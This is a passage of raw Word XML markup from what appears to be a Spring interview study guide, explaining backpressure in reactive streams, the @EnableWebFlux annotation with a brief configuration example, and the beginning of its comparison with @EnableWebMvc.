    <w:p w14:paraId="68A388D2" w14:textId="77777777" w:rsidR="0083373B" w:rsidRPr="00B13F85" w:rsidRDefault="0083373B"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ithout backpressure, if the producer generates data faster than the consumer can process it, the system can run out of memory or other resources, resulting in poor performance or crashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C4CC55" w14:textId="77777777" w:rsidR="0083373B" w:rsidRPr="00B13F85" w:rsidRDefault="0083373B"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Improved Resource Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDFD63B" w14:textId="77777777" w:rsidR="0083373B" w:rsidRPr="00B13F85" w:rsidRDefault="0083373B"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Backpressure helps manage system resources effectively by controlling the rate of data flow, preventing excessive memory usage and CPU load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622A9137" w14:textId="77777777" w:rsidR="0083373B" w:rsidRPr="00B13F85" w:rsidRDefault="0083373B"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Data Integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1611C785" w14:textId="77777777" w:rsidR="0083373B" w:rsidRPr="00B13F85" w:rsidRDefault="0083373B"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Backpressure ensures that data is processed in a controlled way. If backpressure isn’t handled properly, important data might get lost or discarded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431FF94E" w14:textId="77777777" w:rsidR="0083373B" w:rsidRPr="00B13F85" w:rsidRDefault="0083373B"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Maintain System Stability</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAC03D2" w14:textId="77777777" w:rsidR="0083373B" w:rsidRPr="00B13F85" w:rsidRDefault="0083373B"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By using backpressure mechanisms like buffering, dropping, or slowing down the flow of data, systems can remain stable even when the rate of incoming data exceeds the processing speed of the consumer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1B6B01" w14:textId="77777777" w:rsidR="0083373B" w:rsidRPr="00B13F85" w:rsidRDefault="0083373B"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calability</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE4C56D" w14:textId="77777777" w:rsidR="0083373B" w:rsidRPr="00B13F85" w:rsidRDefault="0083373B"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Backpressure ensures that systems can handle high volumes of data without degrading performance. It provides a way to scale the system gracefully by slowing down or controlling the flow of data when necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F76CC0E" w14:textId="77777777" w:rsidR="0083373B" w:rsidRPr="00B13F85" w:rsidRDefault="0083373B"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 Scenarios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7EE677" w14:textId="77777777" w:rsidR="0083373B" w:rsidRPr="00B13F85" w:rsidRDefault="0083373B"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lastRenderedPageBreak/>
        <w:t>Streaming APIs</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When receiving large amounts of streaming data from an external API, backpressure helps manage the flow of data so that the consumer does not get overwhelmed and can handle the data at a manageable rate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5C319B" w14:textId="77777777" w:rsidR="0083373B" w:rsidRPr="00B13F85" w:rsidRDefault="0083373B"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Database Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the application is pushing data into a database and the database cannot keep up with the input rate, backpressure can slow down the data insertion process to prevent the system from becoming overloaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E7E0FF" w14:textId="77777777" w:rsidR="0083373B" w:rsidRPr="00B13F85" w:rsidRDefault="0083373B"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Backpressure Handling Strategies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AF80BC" w14:textId="77777777" w:rsidR="0083373B" w:rsidRPr="00B13F85" w:rsidRDefault="0083373B"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Buffering</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Data is temporarily stored in a buffer until the consumer can process it. This allows the system to continue receiving data without dropping it but requires additional memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EA8DED" w14:textId="77777777" w:rsidR="0083373B" w:rsidRPr="00B13F85" w:rsidRDefault="0083373B"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Dropping</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the system can’t keep up, excess data is discarded. This is often used when it’s acceptable to lose some data, such as in certain event-driven systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B53B0F1" w14:textId="77777777" w:rsidR="0083373B" w:rsidRPr="00B13F85" w:rsidRDefault="0083373B"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Latest Data</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When backpressure occurs, only the latest data is kept, and older data is discarded. This ensures that only the most recent updates are processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B7B9FC" w14:textId="77777777" w:rsidR="0083373B" w:rsidRPr="00B13F85" w:rsidRDefault="0083373B"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 of Backpressure in Reactive Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3766C75F" w14:textId="77777777" w:rsidR="0083373B" w:rsidRPr="00B13F85" w:rsidRDefault="0083373B"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n reactive programming, backpressure is typically handled using a framework like </w:t>
      </w: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Project Reactor</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. For example, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> stream may be configured to handle backpressure in various ways using operators like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFB64A5" w14:textId="77777777" w:rsidR="0083373B" w:rsidRPr="00B13F85" w:rsidRDefault="0083373B"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onBackpressureBuffer()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Buffers data until the consumer is ready.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535105AD" w14:textId="77777777" w:rsidR="0083373B" w:rsidRPr="00B13F85" w:rsidRDefault="0083373B"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onBackpressureDrop()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Drops data when the consumer can't keep up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6653A1E0" w14:textId="77777777" w:rsidR="0083373B" w:rsidRPr="00B13F85" w:rsidRDefault="0083373B"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onBackpressureLatest()</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Keeps only the latest data and drops intermediate data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3175FB06" w14:textId="77777777" w:rsidR="0083373B" w:rsidRPr="00B13F85" w:rsidRDefault="0083373B"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onclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FED47A" w14:textId="3B077AA2" w:rsidR="00163F3B" w:rsidRPr="00CE4B95" w:rsidRDefault="0083373B" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Backpressure is a vital concept in reactive programming that allows systems to maintain high throughput without overloading the consumers. It ensures that the system can handle large amounts of data efficiently and without causing performance degradation or crashes, making it a key part of scalable and responsive applications.</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="76B0BFEF">
          <v:rect id="_x0000_i2289" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="528E8A38" w14:textId="70128396"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03" w:name="_Toc196307983"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the @EnableWebFlux annotation used for</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="503"/>
    </w:p>
    <w:p w14:paraId="65E17846" w14:textId="70BFD3AD" w:rsidR="00281739" w:rsidRPr="00B13F85" w:rsidRDefault="00281739"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EnableWebFlux annotation in Spring is used to enable and configure Spring WebFlux in a Spring application. It is part of the Spring WebFlux module, which is a reactive-stack web framework built on top of Project Reactor. The annotation signals to the Spring context that the WebFlux configuration should be enabled, allowing the application to handle web requests in a non-blocking and reactive manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CFFA5C"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Key Uses of @EnableWebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C46899"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nables Spring WebFlux Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ED92DF" w14:textId="77777777" w:rsidR="00281739" w:rsidRPr="00B13F85" w:rsidRDefault="0028173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t activates the reactive web support in the Spring application, allowing the use of reactive controllers, routers, and other WebFlux components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10282DF6"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Non-blocking I/O and Reactive Endpoints</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7077EBA3" w14:textId="77777777" w:rsidR="00281739" w:rsidRPr="00B13F85" w:rsidRDefault="0028173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hen @EnableWebFlux is applied, the application is capable of handling non-blocking I/O operations, making it suitable for building reactive web applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4397D209"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onfigures the WebFlux Context</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32618CFF" w14:textId="77777777" w:rsidR="00281739" w:rsidRPr="00B13F85" w:rsidRDefault="0028173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t enables configuration of the WebFluxConfigurer interface, which allows developers to customize the default behavior of Spring WebFlux. This can include setting up things like message converters, interceptors, and other web-specific settings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636AD16D"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quired for Router and Handler Function Support</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F124AF" w14:textId="77777777" w:rsidR="00281739" w:rsidRPr="00B13F85" w:rsidRDefault="0028173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f you're using Spring WebFlux with router functions (using a functional approach rather than controllers), @EnableWebFlux is required to set up the appropriate context for routing and handler functions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2518F823"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F410C9"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context.annotation.Configuration;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3334C018"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web.reactive.config.EnableWebFlux;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BA20BA"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web.reactive.config.WebFluxConfigurer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44864867" w14:textId="77777777" w:rsidR="00281739" w:rsidRPr="00B13F85" w:rsidRDefault="00281739" w:rsidP="00B13F85">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E94602C"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Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3A6022"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nableWebFlux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5386E4C6"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WebConfig implements WebFluxConfigurer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79035366"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Additional WebFlux configuration can be added here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA3573C"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085650EC"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When to Use @EnableWebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726B2315"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 xml:space="preserve">Typically, you will use @EnableWebFlux when you are building a Spring application that leverages </w:t>
      </w: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xml:space="preserve"> for handling web requests in a reactive and non-blocking manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132DC30F"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f you are using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Boot starter for WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, Spring Boot automatically configures WebFlux, and you do not need to explicitly add @EnableWebFlux unless you are working with a Spring application not using Spring Boot or need additional WebFlux configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA0D59D"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onclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2FC697"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nableWebFlux is used in Spring to enable the WebFlux framework, which allows for reactive and non-blocking web applications. It provides the necessary configuration to use features like reactive controllers, functional routing, and other components of the Spring WebFlux module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2007D702"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64BA84F">
          <v:rect id="_x0000_i2290" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D038F2" w14:textId="7FBB6525"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04" w:name="_Toc196307984"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How is it different from @EnableWebMvc</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="504"/>
    </w:p>
    <w:p w14:paraId="2404F596" w14:textId="3C987FEB" w:rsidR="00281739" w:rsidRPr="00B13F85" w:rsidRDefault="00281739"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he @EnableWebFlux and @EnableWebMvc annotations in Spring are used to enable two different web frameworks—Spring WebFlux and Spring MVC—each designed for different types of applications: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive (non-blocking)</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traditional (blocking)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, respectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4E2E97"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Key Differences between @EnableWebFlux and @EnableWebMvc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5E5269"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 Purpose:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8C7437"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nableWebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53533560" w14:textId="77777777" w:rsidR="00281739" w:rsidRPr="00B13F85" w:rsidRDefault="0028173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Enables </w:t>
      </w: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xml:space="preserve">, which is a reactive-stack web framework built on </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Project Reactor</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It is designed for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking, asynchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> communication, and is suitable for building reactive applications that require high scalability and low latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A338415" w14:textId="77777777" w:rsidR="00281739" w:rsidRPr="00B13F85" w:rsidRDefault="0028173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orks with reactive programming paradigms and supports both functional (router-based) and annotation-based controllers (like @RestController).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655EFC28"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nableWebMvc</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FC8544" w14:textId="77777777" w:rsidR="00281739" w:rsidRPr="00B13F85" w:rsidRDefault="0028173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Enables </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is the traditional </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>blocking I/O</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> framework. It is designed for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> request processing and is typically used for applications that follow the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Servlet-based model</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D914968" w14:textId="77777777" w:rsidR="00281739" w:rsidRPr="00B13F85" w:rsidRDefault="0028173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orks with annotation-based controllers like @Controller and @RestController in a blocking, thread-per-request model.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BA1477"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2. Programming Model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AFF279"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nableWebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F5CC3F" w14:textId="77777777" w:rsidR="00281739" w:rsidRPr="00B13F85" w:rsidRDefault="0028173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Supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
